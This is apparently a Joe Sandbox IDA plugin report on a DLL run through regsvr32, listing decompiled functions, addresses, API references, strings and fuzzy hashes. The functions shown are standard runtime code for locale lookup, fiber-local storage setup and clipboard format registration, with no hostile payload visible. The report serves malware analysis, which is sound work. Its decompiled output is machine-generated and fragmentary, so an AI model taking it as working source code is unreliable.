0x1004b1ac
0x1004b1ae
0x1004b1c5
0x1004b1cd
0x1004b1cf
0x1004b1e6
0x1004b1ee
0x1004b1f0
0x1004b1fd
0x1004b1fd
0x00000000
0x1004b1f0
0x1004b1dc
0x1004b1e0
0x00000000
0x00000000
0x00000000
0x1004b1e0
0x1004b1bb
0x1004b1bf
0x00000000
0x00000000
0x00000000
0x1004b1bf
0x1004b19a
0x1004b19e
0x00000000
0x00000000
0x00000000
0x1004b19e
0x1004b0fc
0x1004b0fe
0x1004b115
0x1004b11d
0x1004b11f
0x1004b136
0x1004b13e
0x1004b140
0x1004b157
0x1004b15f
0x1004b161
0x1004b16e
0x1004b16e
0x00000000
0x1004b161
0x1004b14d
0x1004b151
0x00000000
0x00000000
0x00000000
0x1004b151
0x1004b12c
0x1004b130
0x00000000
0x00000000
0x00000000
0x1004b130
0x1004b10b
0x1004b10f
0x00000000
0x00000000
0x00000000
0x1004b066
0x1004b066
0x1004b069
0x1004b06d
0x1004b06f
0x1004b086
0x1004b086
0x1004b08a
0x1004b08e
0x1004b090
0x1004b0a7
0x1004b0a7
0x1004b0ab
0x1004b0af
0x1004b0b1
0x1004b0c8
0x1004b0c8
0x1004b0cc
0x1004b0d0
0x1004b0d2
0x1004b0d8
0x1004b0db
0x1004b0df
0x1004b0df
0x00000000
0x1004b0d2
0x1004b0b7
0x1004b0ba
0x1004b0be
0x1004b0c2
0x00000000
0x00000000
0x00000000
0x1004b0c2
0x1004b096
0x1004b099
0x1004b09d
0x1004b0a1
0x00000000
0x00000000
0x00000000
0x1004b0a1
0x1004b075
0x1004b078
0x1004b07c
0x1004b080
0x00000000
0x00000000
0x00000000
0x1004b080
0x1004ac83
0x1004ac83
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: b09dc26b6cbd36b72d4a4843220875c77306704c7617d04a292ef27add846ef7
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 65C17F73C0EDB30A83B5C12D41A826FEBA2AFC159232BC3F48CD47F389956A5D4496D4

Uniqueness

Uniqueness Score: -1.00%

Function 1005D95D Relevance: .0, Instructions: 46
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E1005D95D(intOrPtr* __ecx, intOrPtr* _a4) {
				signed int _t18;
				signed int _t19;
				signed int _t27;
				signed int _t31;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int _t44;

				_t15 = __ecx;
				_t36 =  *(__ecx + 4);
				_t18 = _t36 << 0x1c;
				_t19 = _t18 >> 0x1c;
				if(_t18 == 0 || _t19 == 2) {
					_t20 = _a4;
					_t3 = _t20 + 4; // 0x100be9d4
					_t27 = ( *_t3 << 0x0000001c >> 0x0000001c ^ _t36) & 0x0000000f ^ _t36;
					 *(_t15 + 4) = _t27;
					_t5 = _t20 + 4; // 0x100be9d4
					_t40 = ( *_t5 ^ _t27) & 0x00000010 ^ _t27;
					 *(_t15 + 4) = _t40;
					_t7 = _t20 + 4; // 0x100be9d4
					_t31 = ( *_t7 ^ _t40) & 0x00000020 ^ _t40;
					 *(_t15 + 4) = _t31;
					_t9 = _t20 + 4; // 0x100be9d4
					_t44 = ( *_t9 ^ _t31) & 0x00000040 ^ _t31;
					 *(_t15 + 4) = _t44;
					_t11 = _t20 + 4; // 0x100be9d4
					_t35 = ( *_t11 ^ _t44) & 0x00000080 ^ _t44;
					 *(_t15 + 4) = _t35;
					_t13 = _t20 + 4; // 0x100be9d4
					 *(_t15 + 4) = ( *_t13 ^ _t35) & 0x00000800 ^ _t35;
					 *_t15 =  *_a4;
					return _t15;
				}
				return __ecx;
			}

0x1005d95d
0x1005d960
0x1005d965
0x1005d968
0x1005d96b
0x1005d972
0x1005d976
0x1005d984
0x1005d986
0x1005d989
0x1005d991
0x1005d993
0x1005d996
0x1005d99e
0x1005d9a0
0x1005d9a3
0x1005d9ab
0x1005d9ad
0x1005d9b0
0x1005d9bb
0x1005d9bd
0x1005d9c0
0x1005d9cd
0x1005d9d2
0x00000000
0x1005d9d2
0x1005d9d5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
Instruction ID: 56065d2e7ba31eb1f0cabcf7fe8377e24bdfdb9552a93b06c076dd897f8e7659
Opcode Fuzzy Hash: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
Instruction Fuzzy Hash: AD011B72E115304B9358DF19CA05556FAD2EFCD61475BC2AAC8496B226D531EC028BC0

Uniqueness

Uniqueness Score: -1.00%

Function 100198A8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100198A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100b9e70; // 0x6fb3f782
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1004764D(0x1008ed58, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, 0x10018e62, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = L1004C7D0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10049170(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					L10018E78(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(L10018F28(_t181 - 0x3c, _t181 - 0x64) != 0) {
						L10018F5E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1001963E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10019571(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1004763E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x100198a8
0x100198a9
0x100198af
0x100198b3
0x100198ba
0x100198c0
0x100198c7
0x100198d8
0x100198df
0x100198e2
0x100198e5
0x100198e8
0x100198f6
0x100198f9
0x100198fd
0x100199cb
0x10019a87
0x10019a8b
0x10019a9f
0x10019aa2
0x10019aac
0x10019ab2
0x10019aca
0x10019ad6
0x10019adb
0x10019ade
0x10019ade
0x10019aac
0x100199d1
0x100199e5
0x100199f0
0x10019a06
0x10019a15
0x10019a2d
0x10019a32
0x10019a38
0x10019a44
0x10019a47
0x10019a59
0x10019a65
0x10019a6a
0x10019a6d
0x10019a6d
0x10019a38
0x10019a77
0x10019a77
0x100199f0
0x10019903
0x1001990b
0x1001990e
0x10019911
0x10019923
0x1001992c
0x10019934
0x10019941
0x10019944
0x1001994b
0x1001994f
0x10019953
0x10019956
0x10019959
0x10019966
0x10019972
0x10019977
0x1001997a
0x1001997a
0x10019981
0x10019981
0x10019986
0x10019989
0x100199a0
0x100199a7
0x100199b6
0x10019aec
0x10019af3
0x10019b03
0x10019b06
0x10019b09
0x10019b10
0x10019b13
0x10019b1a
0x10019b26
0x10019b30
0x10019b35
0x10019b35
0x10019b3a
0x10019b3f
0x10019b5c
0x10019b5c
0x10019b63
0x10019b68
0x00000000
0x10019b41
0x10019b41
0x10019b48
0x10019b50
0x00000000
0x00000000
0x10019b52
0x10019b56
0x00000000
0x00000000
0x00000000
0x10019b58
0x10019b5a
0x00000000
0x10019b5a
0x100199bc
0x100199bc
0x10019b6a
0x10019b6d
0x10019b75
0x10019b76
0x10019b77
0x10019b8c
0x10019b8c

APIs

__EH_prolog3.LIBCMT ref: 100198C7
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
ConvertDefaultLocale.KERNEL32(?), ref: 10019937
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE
GetVersion.KERNEL32 ref: 100199C3
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 100199E8
RegQueryValueExA.ADVAPI32 ref: 10019A0D
_sscanf.LIBCMT ref: 10019A2D
ConvertDefaultLocale.KERNEL32(?), ref: 10019A62
ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019A68
RegCloseKey.ADVAPI32(?), ref: 10019A77
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10019A87
EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10018E62,?), ref: 10019AA2
ConvertDefaultLocale.KERNEL32(?), ref: 10019AD3
ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019AD9
_memset.LIBCMT ref: 10019AF3

Strings

ntdll.dll, xrefs: 10019A82
GetUserDefaultUILanguage, xrefs: 100198F0
Control Panel\Desktop\ResourceLocale, xrefs: 100199DB
GetSystemDefaultUILanguage, xrefs: 10019939
kernel32.dll, xrefs: 100198DA

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
Instruction ID: 2d735a54099eb8c66c4ab65cc8d4ae4af9cbc33185515143b8a473405d5eae94
Opcode Fuzzy Hash: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
Instruction Fuzzy Hash: 42817C70D002699ADB10DFA5DC85AEEBBF9FF48340F50012AE955E7280DB789A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10051878 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10051878(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x100be428 = GetProcAddress(_t37, "FlsAlloc");
					 *0x100be42c = GetProcAddress(_t37, "FlsGetValue");
					 *0x100be430 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x100be428;
					_t40 = TlsSetValue;
					 *0x100be434 = _t7;
					if( *0x100be428 == 0) {
						L6:
						 *0x100be42c = TlsGetValue;
						 *0x100be428 = E100514EF;
						 *0x100be430 = _t40;
						 *0x100be434 = TlsFree;
					} else {
						__eflags =  *0x100be42c;
						if( *0x100be42c == 0) {
							goto L6;
						} else {
							__eflags =  *0x100be430;
							if( *0x100be430 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100ba250 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x100be42c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E1004C677();
							 *0x100be428 = E10051420( *0x100be428);
							 *0x100be42c = E10051420( *0x100be42c);
							 *0x100be430 = E10051420( *0x100be430);
							 *0x100be434 = E10051420( *0x100be434);
							_t18 = L1004EB97();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10051556();
								goto L15;
							} else {
								_push(E100516E2);
								_t21 =  *((intOrPtr*)(E1005148C( *0x100be428)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100ba24c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1005496F(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x100ba24c);
										__eflags =  *((intOrPtr*)(E1005148C( *0x100be430)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10051593(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10051556();
					return 0;
				}
			}

0x10051878
0x10051884
0x10051888
0x100518a8
0x100518b5
0x100518c2
0x100518c7
0x100518c9
0x100518d0
0x100518d6
0x100518db
0x100518f3
0x100518f8
0x10051902
0x1005190c
0x10051912
0x100518dd
0x100518dd
0x100518e4
0x00000000
0x100518e6
0x100518e6
0x100518ed
0x00000000
0x100518ef
0x100518ef
0x100518f1
0x00000000
0x00000000
0x100518f1
0x100518ed
0x100518e4
0x10051917
0x1005191d
0x10051920
0x10051925
0x100519f7
0x100519f7
0x100519f7
0x1005192b
0x10051932
0x10051934
0x10051936
0x00000000
0x1005193c
0x1005193c
0x10051952
0x10051962
0x10051972
0x1005197f
0x10051984
0x10051989
0x1005198b
0x100519f2
0x100519f2
0x00000000
0x1005198d
0x1005198d
0x1005199e
0x100519a0
0x100519a3
0x100519a8
0x00000000
0x100519aa
0x100519b6
0x100519b8
0x100519bc
0x00000000
0x100519be
0x100519be
0x100519bf
0x100519d3
0x100519d5
0x00000000
0x100519d7
0x100519d7
0x100519d9
0x100519da
0x100519e1
0x100519e7
0x100519eb
0x100519ef
0x100519ef
0x100519d5
0x100519bc
0x100519a8
0x1005198b
0x10051936
0x100519fb
0x1005188a
0x1005188a
0x10051892
0x10051892

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10048C1A,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1005187E
__mtterm.LIBCMT ref: 1005188A

Part of subcall function 10051556: __decode_pointer.LIBCMT ref: 10051567
Part of subcall function 10051556: TlsFree.KERNEL32(00000021,10048CB6,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051581

GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518A0
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518AD
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518BA
GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518C7
TlsAlloc.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051917
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051932
__init_pointers.LIBCMT ref: 1005193C
__encode_pointer.LIBCMT ref: 10051947
__encode_pointer.LIBCMT ref: 10051957
__encode_pointer.LIBCMT ref: 10051967
__encode_pointer.LIBCMT ref: 10051977
__decode_pointer.LIBCMT ref: 10051998
__calloc_crt.LIBCMT ref: 100519B1
__decode_pointer.LIBCMT ref: 100519CB
__initptd.LIBCMT ref: 100519DA
GetCurrentThreadId.KERNEL32 ref: 100519E1

Strings

FlsAlloc, xrefs: 1005189A
FlsGetValue, xrefs: 100518A2
FlsSetValue, xrefs: 100518AF
FlsFree, xrefs: 100518BC
KERNEL32.DLL, xrefs: 10051879

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
Instruction ID: 0b706c3264f501d65f347b28e59f904ffa28db24f5d0894a088f402869511bed
Opcode Fuzzy Hash: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
Instruction Fuzzy Hash: E631A23D8112A1AAF711EF748C85ADA3BE4EB493A0B104B26FA11C31B1DB34EC85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1003BA9C Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003BA9C(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x1003baa9
0x1003bab2
0x1003babb
0x1003bac5
0x1003bacf
0x1003bad9
0x1003bae3
0x1003baed
0x1003baf7
0x1003bb01
0x1003bb0b
0x1003bb15
0x1003bb1a
0x1003bb21

APIs

RegisterClipboardFormatA.USER32(Native), ref: 1003BAAB
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1003BAB4
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1003BABE
RegisterClipboardFormatA.USER32(Embedded Object), ref: 1003BAC8
RegisterClipboardFormatA.USER32(Embed Source), ref: 1003BAD2
RegisterClipboardFormatA.USER32(Link Source), ref: 1003BADC
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1003BAE6
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1003BAF0
RegisterClipboardFormatA.USER32(FileName), ref: 1003BAFA
RegisterClipboardFormatA.USER32(FileNameW), ref: 1003BB04
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1003BB0E
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1003BB18

Strings

Native, xrefs: 1003BAA4
Rich Text Format, xrefs: 1003BB06
FileName, xrefs: 1003BAF2
Link Source Descriptor, xrefs: 1003BAE8
Embed Source, xrefs: 1003BACA
Object Descriptor, xrefs: 1003BADE
FileNameW, xrefs: 1003BAFC
OwnerLink, xrefs: 1003BAAD
Link Source, xrefs: 1003BAD4
ObjectLink, xrefs: 1003BAB6
Embedded Object, xrefs: 1003BAC0
RichEdit Text and Objects, xrefs: 1003BB10

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
